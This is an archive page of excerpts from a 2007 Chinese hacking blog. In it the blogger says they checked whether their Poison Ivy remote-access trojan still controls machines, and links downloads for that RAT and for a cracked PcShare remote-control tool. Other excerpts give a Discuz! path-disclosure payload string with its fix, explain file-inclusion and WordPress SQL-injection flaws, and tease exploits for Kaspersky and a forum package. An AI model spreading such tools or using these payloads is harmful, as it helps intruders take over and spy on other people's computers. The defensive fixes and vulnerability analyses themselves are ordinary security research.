2007年1月 的日志

Poison Ivy RAT Version 2.2.0 released! 2007-01-14

昨天想看看自己的 Poison Ivy 上还有机子没,却发现 Poison Ivy 提示升级,看了下,是 Version 2.2.0 。

下载地址: http://www.poisonivy-rat.com/dl.cgi?mirror=220poisonivy-rat.com

It's time for a well needed update of the server core. This time I have added a much stronger encryption (Camellia with 256 bit password).
Due to this old servers wont be compatible with the new client.
阅读全文 »

Tags:

Kaspersky Antivirus 6.0 Local Privilege Escalation Exploit

来源:milw0rm.com

阅读全文 »

Tags: ,

Discuz! 5.0.0 爆物理路径

来源:zhuzhu's BLOG

只要输入:&extra%5B%5D=page%3D1#pid1453 就会出错,并显示出网站物理地址!


测试牛B站点 黑客基地

一样有漏洞!!!

解决方案:

config.inc.php里通 $errorreport = 1;

这个设置为0

这个和php的安全设置有关。

然后:

php.ini里

display_errors = Off (如果你没有主机权限那就看下面的。)
阅读全文 »

Tags:

包含文件漏洞详解

作者:IceskYsl@1st
来源:天马行空{1.S.T}(http://www.1steam.cn)/
申明:本站原创,欢迎转载,请注明来源天马行空{1.S.T}(http://www.1steam.cn)/
=============

首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。几乎所有的cgi程序都有这样的 bug,只是具体的表现方式不一样罢了。

一、涉及到的危险函数〔include(),require()和include_once(),require_once()〕

include() && require()语句:包括并运行指定文件。
阅读全文 »

Tags:

Exploit For Blue Magic Forum All Version

作者:拖鞋王子 Mokfly 媒婆X

阅读全文 »

Tags:

被点了名

05年开始有人玩这样的游戏。。这好像是我第三次被点名了。。第一次第二次第三次
这次是被大O点到的。

游戏规则:
一、被点到名的博客要在自己的博客上回答本人问题的答案,并自己拟定五个问题,传到其他几个人的博客上,还要到这几个人的博客上留言通知对方“你被点名了”。
二、并且这几个人要在博客上注明是在哪接到的题目,我是被“大O”点的名。
阅读全文 »

Tags:

WordPress wp-trackback.php漏洞分析

来源:幻影

WordPress wp-trackback.php漏洞分析
文/Superhei 2007/1/9
1.Stefan Esser大牛2007/01/05发布的WordPress Trackback Charset Decoding SQL Injection Vulnerability [1]

Code:wp-trackback.php

$tb_url = $_POST['url'];
$title = $_POST['title'];
$excerpt = $_POST['excerpt'];
$blog_name = $_POST['blog_name'];
$charset = $_POST['charset'];
…….
if ( function_exists('mb_convert_encoding') 阅读全文 »

Tags: ,

PcShareVIP061231破解版–Cracked BY XiaoGuang

信息来源:x140yu

Cracked BY XiaoGuang

下载: s200711211528.rar

Tags: